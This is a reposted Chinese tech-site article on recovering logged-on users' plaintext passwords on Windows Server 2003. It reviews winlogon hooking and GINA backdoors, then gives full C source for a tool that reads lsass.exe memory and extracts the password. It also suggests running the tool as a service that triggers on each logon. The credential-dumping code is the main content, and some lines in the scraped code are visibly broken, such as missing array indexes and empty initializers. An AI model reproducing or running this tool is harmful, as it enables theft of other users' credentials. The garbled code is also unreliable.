网站建设| 数据库类| 图形图象| 程序设计| 现代办公| 操作系统| 考试认证| 网络技术| 软件工程| 电脑相关| 文学作品
网站开发| 网页制作| 操作系统| 图象图形| 考试认证| 数据库类| 程序设计| 硬件技术| 现代办公| 网络技术| 笑话频道
 
您的位置: 电脑书库首页-> 电脑文摘-> 操作系统-> Win2003/2008-> 在win 2003中得到登陆密码

在win 2003中得到登陆密码
作者:佚名 来源:InterNet 加入时间:2005-4-7
相关文章
  • 巧妙突破Win 2003系统的种种限制
  • 为Win 2003加装视频压缩
  • 设置Win 2003的本地策略应用
  • 在Win 2003配置DNS
  • 轻松提高Win 2003的运行速度
  • 为Win 2003中添加LPT端口
  • Win 2003系统十例最新配置技巧
  • 在Win 2003中安全的释放内存
  • 查看Win 2003日志的简单办法
  • Win 2003中如何实现网络共享还原
  • 相关书籍:
    在所有NT系统中,都是有几种方法可以得到登陆用户的密码的。我知道的三种方法可以达到目的。
     
      1.hook了winlogon中几个函数,网上也有这类型的程序,叫winlogonhijack的项目在rootkit.com中有提供,不过那个项目只对本地登陆用户有效,远程登陆用户无效。

      2.使用Gina和winlogon进行套接,只要对某些函数执行自己的记录密码的代码,就可以将密码记录下来,稳定性高,而且对本地或远程登陆都有效,不过现存的gina后门程序在XP或2003中都有些函数没有被导出过,主要因为xp和2003等在winlogon中加入了新的函数。

      3.直接读取内存数据得到明文密码。在NT 4.0/2K中,早就有程序findpass可以直接读到winlogon进程中的内存数据而直接得到登陆用户密码,因为在NT4.0和2K中,帐号的信息,包括域名,帐号和密码都是有规律地在winlogon内存中的特定地址中,所以可以很简单就得到。但在XP和2003系统中,这样方法是无效的了,似乎我们是没有办法直接读出明文地址了。下面我们就来谈谈如何象findpass在NT 4.0和2K在,在server 2003中得到登陆用户的密码。

      虽然XP和2003是不象以前的NT系统那样将登陆用户信息保存在winlogon进程的内存地址内,但是基Lsass进程对于要处理些信息时,需要得到明文的登陆用户密码,所以登陆用户的密码会在Lsass进程中出现(微软没有将密码在Lsass进程中进行加密,微软的说法是因为Lsass需要得到明文的密码,就算将密码加密,也都只能用可逆的方法加密,只要跟踪lsass的操作,一样可以得到明文密码,所以微软使用了比较懒惰的方法,可能也是为了加快响应速度,所以将明文密码更是放在lsass进程内存内)。说到这里,大家心里都清楚了,登陆用户的密码是在lsass进程的内存中。对,就是这么一回事,但是要得到这个明文密码,真是象使用NT 4.0和2K下的findpass那样容易吗?事实上并不是那么容易,因为以下几个原因:

      A.密码存放在lsass进程中的内存地址是没有规律的

      B.密码有可能被最后登陆的用户复盖(例如管理员abc从本地登陆,然后管理员bbb从远程登陆,然后管理员bbb注销终端,存放在lsass.exe进程内存中的密码,还是管理员bbb的密码),又或者用户登陆后,然后注销了,那么我们就算得到了密码,也不知道是哪个用户的密码。

      C.密码前后的数据也是没有规律的,如果有规律,例如密码前的数据,一定是有一段全是01字符的数据段,那么定位密码就简单。

      原因A和C都给我们带来定位密码的困难,原B就带来不能确定密码和帐号对应的问题.看来微软在新的系统还是做过点功夫。不过我们是不会放弃的,就算是碰碰运气,也看能不能得到密码,反正就算失败,也没什么关系。

      最后的代码,是我写来测试是不是能在2003的系统中得到登际用户的密码,结果也正好象我们上面的分析一样(当然了,上面的结果是用这程序测测得到的)。成功率当然不高,因为受太多原因所影响,定位密码上的困难或者无法定位,或者得到不是密码的信息等等的原因,都令失败率显得相当高,不过总还是一种方法,或者将来有人可以准确定位到,那就是令人高兴了。虽然说失败率高,但在一种情况下,成功率却是很高的,那就是管理员只是在本地或终端中登陆了,以后再没有用户从本地或终端登陆过,而且管理员也没有锁上过系统,那么成功率就会是相当高的了。

        提高成功率的两种做法:

      1.程序直接写成服务,定时检查本地或远程登陆(其实没什么分别),当检测到登陆后,去搜索lsass进程内存,尝试得到密码。
     
      2.程序模拟一个登陆(使用LogonUser()就能搞定),因为使用LogonUser()这个API,你要提供帐号名和对应的正确的密码,才可以成功,然后你就可以去搜索lsass进程内存。因为知道密码是什么,我们就能定位到密码是保存在什么地方。因为登陆用户的密码都是保存在同一个地址或相离不远的地址中,模拟登陆和搜索,可以先定位以后登陆的用户的密码会大约保存在什么位置。

      无论怎说,三种方法中,最稳定,最安全的方法还是使用Gina那种方法.Hijack了winlogn一些API的方法,毕竟是改动了系统的东西,对系统的稳定性来说,会有考验,直接搜索lsass进程内存的方法呢,虽说也是困难,但准确性,成功率却又是低。

      下面的代码使用的是很笨,而且很原始的搜索方法,主要是搜索Lsass内存中"LocalSystem Remote Procedure"这个字符串,因为在相当多的测试中,密码都是保存在有这个字符串的地址后一点的位置中,当然了,很多系统并没有这个字符串,或者就算有,我们得到的都是错误的密码。

        代码: //********************************************************************************
    // Version: V1.0
    // Coder: WinEggDrop
    // Date Release: 12/15/2004
    // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
    //          Used Is Pretty Unwise,But This May Be The Only Way To Review The
    //          Logon User's Password On Windows 2003.
    // Test PlatForm: Windows 2003
    // Compiled On: VC++ 6.0
    //********************************************************************************
    #include <stdio.h>
    #include <windows.h>
    #include <tlhelp32.h>

    #define BaseAddress 0x002b5000        // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

    char  Password[MAX_PATH] = ;        // Store The Found Password

    // Function ProtoType Declaration
    //------------------------------------------------------------------------------------------------------
    BOOL  FindPassword(DWORD PID);  
    int   Search(char *Buffer,const UINT nSize);  
    DWORD GetLsassPID();  
    BOOL  Is2003();  
    //------------------------------------------------------------------------------------------------------
    // End Of Fucntion ProtoType Declaration

    int main()  
    {  
    DWORD PID = 0;  
    printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");  

    if (!Is2003())        // Check Out If The Box Is 2003
    {  
         printf("The Program Can't Only Run On Windows 2003 Platform\n");  
         return -1;  
    }  

    PID = GetLsassPID();        // Get The Lsass.exe PID

    if (PID == 0)        // Fail To Get PID If Returning Zerom
    {  
         return -1;  
    }  

    FindPassword(PID);        // Find The Password From Lsass.exe Memory
    return 0;  
    }  
    // End main()

    //------------------------------------------------------------------------------------
    // Purpose: Search The Memory & Try To Get The Password
    // Return Type: int
    // Parameters:    
    //           In: char *Buffer        --> The Memory Buffer To Search      
    //          Out: const UINT nSize   --> The Size Of The Memory Buffer
    // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
    //       Since The Password Is Near The Above Location,But It's Not Always True That
    //       We Will Find The Magic String,Or Even We Find It,The Password May Be Located
    //       At Some Other Place.We Only Look For Luck
    //------------------------------------------------------------------------------------
    int Search(char *Buffer,const UINT nSize)  
    {  
    UINT OffSet = 0;  
    UINT i = 0;  
    UINT j = 0 ;  
    UINT Count = 0;  
    if (Buffer == NULL)  
    {  
         return -1;  
    }  
    for (i = 0 ; i < nSize ; i++)  
    {  
         /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
            Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
            The Magic String,We Have To Do It Manually And Slowly
         */  
         if (Buffer == 'L')  
         {  
             OffSet = 0;  
             if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)  
             {  
                 OffSet += strlen("LocalSystem") + 1;  
                 if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)  
                 {  
                     OffSet += strlen("Remote") + 1;  
                     if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)  
                     {  
                         OffSet += strlen("Procedure") + 1;  
                         if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)  
                         {  
                             i += OffSet;  
                             break;  
                         }  
                     }  
                 }  
             }  
         }  
    }  
    if (i < nSize)  
    {  
         ZeroMemory(Password,sizeof(Password));  
         for (; i < nSize ; i++)  
         {  
             if (Buffer == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)  
             {  
                 /* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
                 That Way
                 */  
                 j = i + 7;  
                 for (; j < nSize; j += 2)  
                 {  
                     if (Buffer[j] >  0)  
                     {  
                         Password[Count++] = Buffer[j];  
                     }  
                     else  
                     {  
                         break;  
                     }  
                 }  
                 return i + 7;        // One Flag To Indicate We Find The Password
             }  
         }  
    }  
    return -1;        // Well,We Fail To Find The Password,And This Always Happens
    }  
    // End Search

    //------------------------------------------------------------------------------------
    // Purpose: To Get The Lsass.exe PID
    // Return Type: DWORD
    // Parameters:  None
    //------------------------------------------------------------------------------------
    DWORD GetLsassPID()  
    {  
    HANDLE hProcessSnap;  
    HANDLE hProcess = NULL;  
    PROCESSENTRY32 pe32;  
    DWORD PID = 0;  

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);  
    if( hProcessSnap == INVALID_HANDLE_VALUE )  
    {  
         printf("Fail To Create Snap Shot\n");  
         return 0;  
    }  

    pe32.dwSize = sizeof(PROCESSENTRY32);  

    if( !Process32First(hProcessSnap, &pe32))  
    {  
         CloseHandle(hProcessSnap);     // Must clean up the snapshot object!
         return 0;  
    }  

    do  
    {  
      if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)  
      {  
          PID = pe32.th32ProcessID;  
          break;  
      }  
    }while(Process32Next( hProcessSnap, &pe32));  

    CloseHandle( hProcessSnap);  
    return PID;  
    }  
    // End GetLsassPID()

    //------------------------------------------------------------------------------------
    // Purpose: To Find The Password
    // Return Type: BOOLEAN
    // Parameters:    
    //           In: DWORD PID        ->        The Lsass.exe's PID
    //------------------------------------------------------------------------------------
    BOOL FindPassword(DWORD PID)  
    {  
    HANDLE hProcess = NULL;  
    char   Buffer[5 * 1024] = ;  
    DWORD  ByteGet = 0;  
    int    Found = -1;  

    hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID);        // Open Process
    if (hProcess == NULL)  
    {  
         printf("Fail To Open Process\n");  
         return FALSE;  
    }  

    if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet))        // Read The Memory From Lsass.exe
    {  
         printf("Fail To Read Memory\n");  
         CloseHandle(hProcess);  
         return FALSE;  
    }  

    CloseHandle(hProcess);  
        
    Found = Search(Buffer,ByteGet);        // Search The Password
    if (Found >= 0)        // We May Find The Password
    {  
         if (strlen(Password) > 0)        // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
         {  
             printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);  
         }  
    }  
    else  
    {  
         printf("Fail To Find The Password\n");  
    }  
    return TRUE;  
    }  
    // End FindPassword

    //------------------------------------------------------------------------------------
    // Purpose: Check If The Box Is Windows 2003
    // Return Type: BOOLEAN
    // Parameters:  None
    //------------------------------------------------------------------------------------
    BOOL Is2003()  
    {  
    OSVERSIONINFOEX osvi;  
    BOOL b0sVersionInfoEx;  
    ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));  
    osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);  

    if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))  
    {  
         osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);  
    }  
    return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);  
    }  
    // End Is2003()
    // End Of File

      附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.

      用法:

      1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置

      2.Locator 用户名 密码 -> 在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。


    [文章录入员:nancy]

    相关文章
  • 巧妙突破Win 2003系统的种种限制
  • 为Win 2003加装视频压缩
  • 设置Win 2003的本地策略应用
  • 在Win 2003配置DNS
  • 轻松提高Win 2003的运行速度
  • 为Win 2003中添加LPT端口
  • Win 2003系统十例最新配置技巧
  • 在Win 2003中安全的释放内存
  • 查看Win 2003日志的简单办法
  • Win 2003中如何实现网络共享还原
  • 相关书籍:
    本站推荐内容

    近期主机类热搜关键词:
    美国服务器 美国服务器租用 海外服务器租用 国外服务器租用

    Win2003/2008
    Win9X/ME
    Win2000
    Win2003/2008
    Unix系列
    Linux系列
    WindowsXP
    WinVista/WIN7
    注册表
    其它
    电脑教程阅读排行
    ·Windows2003网络服务器...
    ·Windows server 2...
    ·Windows 2003安装后必...
    ·Windows命令
    ·Windows 2003 加速大...
    ·关闭WIN2003关机事件跟踪程...
    ·windows server 2...
    ·在Win 2003配置DNS
    ·Windows 2003 系统设...
    ·无盘Windows 2003安装...